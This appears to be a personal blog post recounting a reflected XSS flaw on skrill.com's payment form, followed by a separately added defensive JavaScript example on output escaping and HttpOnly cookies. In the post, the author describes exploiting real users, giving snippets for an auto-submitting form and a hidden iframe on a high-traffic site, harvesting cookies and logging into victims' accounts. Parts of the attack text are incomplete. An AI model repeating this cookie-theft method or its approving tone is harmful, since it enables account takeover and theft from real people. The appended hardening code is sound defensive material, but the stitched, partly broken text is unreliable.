I have been studying the wonderful world of hacking in the last few months. A book I read on pen-testing suggested looking at http://www.reddit.com/r/xss for news on XSS, new methods, examples etc.
I had never used reddit before; now I am hooked on it. I always thought of XSS as a strange problem. I didn't understand how someone could attack your website or really do anything with XSS other than redirect users to another website or so, and to achieve even that the XSS would have to be stored in a database or something and displayed to other users.
Then I realized that XSS is one of the worst holes you can have on your website. One can use an XSS attack to steal your cookies and basically be authorized and have access wherever you have access.
So today I saw that: http://www.reddit.com/r/xss/comments/2jea1h/xss_on_payment_form_skrill/
This was a brief skrill.com XSS vulnerability. It was active for 24 hours. This guy found a form where input is not filtered. Specifically
So, how to exploit it (I actually tried this and it worked).
You will have to create a form:
<script> document.forms["myform"].submit(); </script>
And load it onto some other (preferably high-traffic) website.
<iframe width="0" height="0" src="http://www.mysite.com/xss.php"></iframe>
Then what happens: every time someone visits your website, you get their cookies. Then you visit skrill.com, use their cookies, and you are logged in as them.
I actually tried this. I left it online for 10 hours on a high-traffic website, got 2 valid cookies, used them and logged in. I could easily have sent the money to my account. Now, actually being able to do that is more important to me than actually stealing from the poor guys that I exploited, but it was sure the highlight of my hacking attempts. It's not every day that you can say you hacked skrill.com.
And it was all done with kindergarten-level knowledge in terms of hacking and some luck.
I always thought that those holes don't exist anymore, especially in large websites. But I was wrong. Developers make mistakes every day.
This was online for a full day before they fixed it.
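As an added, defender-side example (not code from the original post or from Skrill): the unfiltered-reflection bug described above beside its encoded form, and the HttpOnly cookie attribute that keeps injected script from reading the session cookie through document.cookie. The form, field and cookie names and the probe value are made up.

```javascript
// Added example, not code from the original post. Shows why an unescaped
// form value becomes markup, how output encoding stops it, and which cookie
// attribute keeps a session token out of document.cookie.

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the submitted value is interpolated verbatim into an attribute,
// so a quote in the input closes the attribute and the rest becomes markup.
function renderUnsafe(value) {
  return `<form name="pay"><input name="amount" value="${value}"></form>`;
}

// Hardened: the value is HTML-escaped for the attribute context it lands in.
function renderSafe(value) {
  return `<form name="pay"><input name="amount" value="${escapeHtml(value)}"></form>`;
}

// Session cookie as it should be issued: HttpOnly keeps it out of
// document.cookie, Secure keeps it off plain HTTP, SameSite limits
// cross-site sends (cookie name and token are assumed).
function sessionCookieHeader(token) {
  return `session=${encodeURIComponent(token)}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Audit check for a Set-Cookie header: true when page script can read it,
// i.e. when the HttpOnly attribute is missing.
function cookieReadableByScript(setCookieHeader) {
  return !setCookieHeader
    .split(';')
    .some((attr) => attr.trim().toLowerCase() === 'httponly');
}

// Audit check for rendered output: count opening tags. The template defines
// exactly two elements; any extra one was smuggled in through the input.
function elementCount(html) {
  return (html.match(/<[a-zA-Z][^>]*>/g) || []).length;
}

// Constructed probe: a harmless tag, enough to show attribute breakout.
const PROBE = '"><b>probe</b>';

console.log(renderUnsafe(PROBE)); // 3 elements: the <b> escaped the attribute
console.log(renderSafe(PROBE));   // 2 elements: the probe stayed text
```

A test suite can run elementCount over every page that reflects input; a count above what the template defines means an encoding step was skipped.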